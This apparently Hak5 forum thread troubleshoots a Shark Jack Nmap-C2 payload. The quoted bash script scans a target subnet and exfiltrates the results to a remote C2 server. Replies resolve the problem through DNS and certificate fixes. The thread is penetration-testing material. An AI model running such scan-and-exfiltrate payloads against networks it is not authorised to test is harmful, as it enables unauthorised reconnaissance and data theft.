Peque Posted March 6, 2022

Hi Forum, I've bought an essentialKit, and have most of it running as expected. I've downloaded the payload from the Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2

The Sharkjack is updated to the latest Firmware - Version 1.1.0, and I can see the Sharkjack does everything that I want, the Loot is created etc. I can see that during execution of the payload, the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud. As I can see - it shouldn't be an issue with my C2 Cloud - since I have Wifi Pineapple, LAN Turtle and Squirrel running and connecting to C2 Cloud.

How can I check this further, since as I can see - I can not SSH to the sharkjack during the run of the payloads. And I have tried reconfiguring my C2 Cloud settings on the jack several times without any luck.

The executed payload:

```bash
#!/bin/bash
#
# Title: Nmap Payload for Shark Jack w/ C2
# Author: Hak5 (modifications from REDD)
# Version: 1.1
#
# All credit goes to Hak5 Team. I just threw in a simple check for if
# C2 is provisioned in the SharkJack. - If so, exfiltrate!
#
# Scans target subnet with Nmap using specified options. Saves each scan result
# to loot storage folder. Exfiltrates all scans to C2 if provisioned.
#
# LED SETUP ... Obtaining IP address from DHCP
# LED ATTACK ... Scanning
# LED FINISH ... Scan Complete
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.

C2PROVISION="/etc/device.config"
NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
LOOT_DIR=/root/loot/nmap

# Setup loot directory, DHCP client, and determine subnet
LED SETUP
mkdir -p $LOOT_DIR
COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
NETMODE DHCP_CLIENT
while [ -z "$SUBNET" ]; do
  sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done

# Scan network
LED ATTACK
nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt

# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
  LED SPECIAL
  # Connect to Cloud C2
  C2CONNECT
  # Wait until Cloud C2 connection is established
  while ! pgrep cc-client; do sleep 1; done
  # Exfiltrate all test loot files
  FILES="$LOOT_DIR/*.txt"
  for f in $FILES; do
    C2EXFIL STRING $f Nmap-C2-Payload
  done
else
  # Exit script if not provisioned for C2
  LED R SOLID
  exit 1
fi

LED FINISH
sleep 2 && halt
```

Can I just disable the last 2 lines - so I can SSH into the jack to see what and if there's an error while trying to connect to my C2 Cloud? Since everything else is working as intended - I do not get why I can't get this Sharkjack to deliver to my C2 Cloud. Any ideas of what is wrong?

/P
dark_pyrro Posted March 6, 2022

Not sure if I missed reading some info, but have you gotten the Shark to connect to C2 at all? Not specifically delivering loot, but that you can see it as a connected device in the C2 interface. You could try a payload that just connects as a DHCP client (with sshd started) to a network and ssh into it and try to connect to C2 and extract loot manually, looking for errors. Does the cc-client error log in /tmp tell anything? How are you running your C2 server? Using https?
Peque (Author) Posted March 6, 2022

I have placed the device.config in /etc/. Yes - my C2 is running https. I have also tried the default payload --> which just should test this C2EXFIL - but still not getting anything to my C2 Cloud. The only thing in cc-client-error are these 3 lines repeating:

```text
[1646558183 !ERR INITSYNC ] Error in startup sync post
[1646558183 !ERR MAIN ] Device startup sync failed. Retrying...
[1646558188 !ERR CURL ] Error posting update to server...
```

But other devices on the same network are working without problem.

Well - found the problem - internal DNS. Since this is just a test setup at the moment, a separate network at home. /etc/resolv.conf --> only nameserver 127.0.0.1. Adding my local DNS server (pfSense firewall) - and now I'm able to connect to the C2 Cloud.

Extra: Is it possible to make it add this DNS server automatically - as a failover DNS, so if the default DNS - 127.0.0.1 - does not resolve, then add a specified extra DNS server?

And thanks for the input - that gave me the answer.
dark_pyrro Posted March 6, 2022

Perhaps try the following (interface name might need to be changed, can't remember the Shark interface name off the top of my head):

```bash
uci set network.wan.dns="8.8.8.8 8.8.4.4"
uci commit network
service network reload
```

Some more info that might help: https://openwrt.org/docs/guide-user/base-system/dhcp_configuration#upstream_dns_provider
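An added example, not from this thread or from Hak5: a small helper that applies the uci change suggested above only when the Shark's current resolver cannot resolve the C2 hostname, which is the failover behaviour asked for in the previous post. It assumes the UCI interface is named `wan` and uses placeholder values for the fallback resolver and the C2 hostname; check `uci show network` on your device before relying on the interface name.

```bash
#!/bin/bash
# Fallback-DNS helper for an OpenWrt-based Shark Jack payload (added example).
# Assumptions: UCI interface name "wan"; FALLBACK_DNS and PROBE_HOST are
# placeholders to replace with your local resolver (e.g. pfSense) and C2 host.
FALLBACK_DNS="${FALLBACK_DNS:-192.168.1.1}"   # placeholder local resolver
PROBE_HOST="${PROBE_HOST:-c2.example.com}"    # placeholder C2 hostname

# Return 0 when the given resolv.conf text lists only loopback resolvers
# (or none at all). This is the failure mode seen in the thread:
# /etc/resolv.conf containing just "nameserver 127.0.0.1".
only_loopback_resolver() {
  local conf="$1" ns
  ns=$(printf '%s\n' "$conf" | awk '$1=="nameserver"{print $2}')
  [ -n "$ns" ] || return 0                    # no nameserver at all: broken
  printf '%s\n' "$ns" | grep -qv '^127\.' && return 1   # a real resolver exists
  return 0
}

# Return 0 when the host resolves with the resolvers currently configured.
can_resolve() {
  nslookup "$1" >/dev/null 2>&1
}

# Add the fallback resolver through UCI only if resolution is actually broken,
# so a working DHCP-supplied resolver is left untouched.
ensure_dns() {
  if can_resolve "$PROBE_HOST"; then
    echo "DNS OK, leaving network config unchanged"
    return 0
  fi
  if only_loopback_resolver "$(cat /etc/resolv.conf 2>/dev/null)"; then
    echo "Only loopback resolver configured; adding fallback $FALLBACK_DNS"
    uci set network.wan.dns="$FALLBACK_DNS"
    uci commit network
    service network reload
    return 0
  fi
  echo "Resolver configured but $PROBE_HOST still does not resolve; check upstream DNS" >&2
  return 1
}
```

In the payload above, call `ensure_dns` after `NETMODE DHCP_CLIENT` and before `C2CONNECT`, so cc-client only starts once the C2 hostname resolves.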
TheReelBillbo Posted March 23, 2023

Hi, I am stuck here myself. I have uploaded the device.config, ran C2CONNECT, but when checking /tmp/cc-client-error.log I have the following:

```text
[1679537734 !ERR INITSYNC ] Error in startup sync post
[1679537734 !ERR MAIN ] Device startup sync failed. Retrying...
```

Which just keeps repeating. I had issues trying to UPDATE_FIRMWARE and UPDATE_PAYLOAD but was able to get those working properly by setting the date. The SJC never checks in to C2 either. Any help is appreciated, I have reviewed the forums and am striking out...
dark_pyrro Posted March 23, 2023

Can you ping, for example, www.google.com from the Shark? Where is your C2 server located? Locally on your own network or accessible over internet?
TheReelBillbo Posted March 23, 2023

6 hours ago, dark_pyrro said:
> Can you ping, for example, www.google.com from the Shark? Where is your C2 server located? Locally on your own network or accessible over internet?

Yes, I can ping my C2 instance, I can ping example.com and 8.8.8.8 or anything else from the SJC. My C2 server is internet based.
dark_pyrro Posted March 23, 2023

Are you starting the C2 server using the https parameter?
0ne-nine9 Posted April 25, 2023

Hey all! Just wanted to drop in and note my own experience. All of the above applied to me, but one thing I modified is that I stopped using self-signed certificates with openssl. Instead, I modified the service as per the guidance below, to ensure I use Let's Encrypt with the following switches enabled: -hostname {hostname} -https

This allowed my SharkJack to quickly connect and transfer loot to the C2. It seems that it doesn't like self-signed certificates at all, which makes sense in hindsight.